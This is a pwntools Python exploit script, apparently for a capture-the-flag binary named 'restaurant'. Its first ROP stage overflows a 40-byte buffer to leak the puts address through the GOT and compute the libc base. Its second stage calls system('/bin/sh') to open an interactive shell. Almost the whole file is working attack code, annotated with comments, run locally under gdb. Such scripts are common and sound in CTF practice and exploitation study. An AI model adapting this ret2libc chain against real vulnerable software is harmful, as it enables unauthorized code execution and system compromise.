"""Interaction driver for the `restaurant` binary (pwntools).

Flow as written below:
  1. send a first stage that calls puts() on the GOT entry of puts and then
     returns into the binary's `fill` function;
  2. parse the 6 leaked address bytes out of the program output and derive
     the libc base from the local libc's puts offset;
  3. send a second stage that calls puts("/bin/sh") and then system("/bin/sh")
     from libc, and drop into an interactive session.

Assumptions visible in the code: `elf.plt`/`elf.got` addresses are used before
any leak, so the binary is expected not to be position-independent; libc
offsets come from the local `/lib/x86_64-linux-gnu/libc.so.6`, so the target's
libc must match it; and the 40-byte padding must exactly reach the saved
return address.  The process is started under gdb in a tmux split.
"""
from pwn import *

# gdb (via gdb.debug below) is opened in a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
# checksec=0 only suppresses the checksec banner; it does not change the ELF.
elf = ELF('restaurant', checksec=0)

# Always-true toggle; the `else` branch is dead.  Presumably left over from
# switching between a debug run and a plain/remote run -- TODO confirm.
if True:
    proc = gdb.debug(elf.path, '\n'.join([
        # 'b *0x00400ed2', # after read
        # 'b *0x00400eec', # ret
        'c'  # gdb script: no breakpoints active, just continue
    ]))
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=0)
else:
    pass

# Stage 1 chain: puts(got['puts']) prints the resolved puts address, then
# return into `fill` so the program reads a second payload.
rop1 = ROP([elf])
rop1.call(elf.plt['puts'], [elf.got['puts']])
rop1.call(elf.symbols['fill'])

# Menu choice (sent as str; newer pwntools versions warn and expect bytes).
proc.sendline('1')
# 40 bytes up to the saved return address; presumably a 32-byte buffer plus
# the 8-byte saved rbp -- TODO confirm against the binary.
padding = b'a' * 32 + b'b' * 8
proc.send(padding + rop1.chain())
# The target appears to echo the input back; skip it so the leak is next.
proc.recvuntil(padding)

# Text that follows the leaked address in the output; the leak is the 6 bytes
# immediately before it (a canonical user-space address has 6 significant
# bytes), zero-padded to 8 for u64().
marker = b'\n\x1b[1;6;32m\nYou can add these'
result = proc.recvuntil(marker)
# The list wrapper just prints the bytes repr with escapes visible.
print(f'Read the following: {[result]}')
offset_addr_raw = result[-6 - len(marker): -len(marker)].ljust(8, b'\x00')
offset_addr = u64(offset_addr_raw)
print(f'Found offset address {offset_addr_raw} --> {hex(offset_addr)}')
# Rebase the local libc so every symbol below resolves in the target.
libc.address = offset_addr - libc.symbols['puts']
print(f'Found libc at {hex(libc.address)}')

# Stage 2 chain: puts("/bin/sh") first (presumably a sanity check that the
# computed base is right -- confirm), then system("/bin/sh").
rop2 = ROP([libc])
rop2.call(libc.symbols['puts'], [next(libc.search(b'/bin/sh'))])
rop2.call(libc.symbols['system'], [next(libc.search(b'/bin/sh'))])
proc.send(padding + rop2.chain())
proc.interactive()

# NOTE(review): the commented-out block below is never executed.  It looks like
# a reference copy of pwntools' own gdb/tmux pane workaround (the "line 277"
# presumably points into that module); kept here as the author left it.
# line 277
# # Ugly solution to fix gdb and tmux compatibility
# if terminal == 'tmux':
#     found = False
#     while not found:
#         log.info('Looking for gdb subprocess (the ugly way)')
#         import time
#         time.sleep(0.1)
#         import subprocess
#         output = subprocess.check_output(['ps', '-ax', '-o', 'pid:1,args:1'])
#         programs = [(line.split(b' ')[0], b' '.join(line.split(b' ')[1:])) for line in output.split(b'\n')][::-1]
#         search_argv = (' '.join(command) if isinstance(command, (list, tuple)) else command).replace('  ', ' ').replace('"', '').encode()
#         for pid_test, argv_test in programs:
#             if argv_test == search_argv:
#                 log.debug('Found gdb pid: %s' % pid_test)
#                 pid = int(pid_test)
#                 found = True
#                 break
#     os.system('tmux last-pane')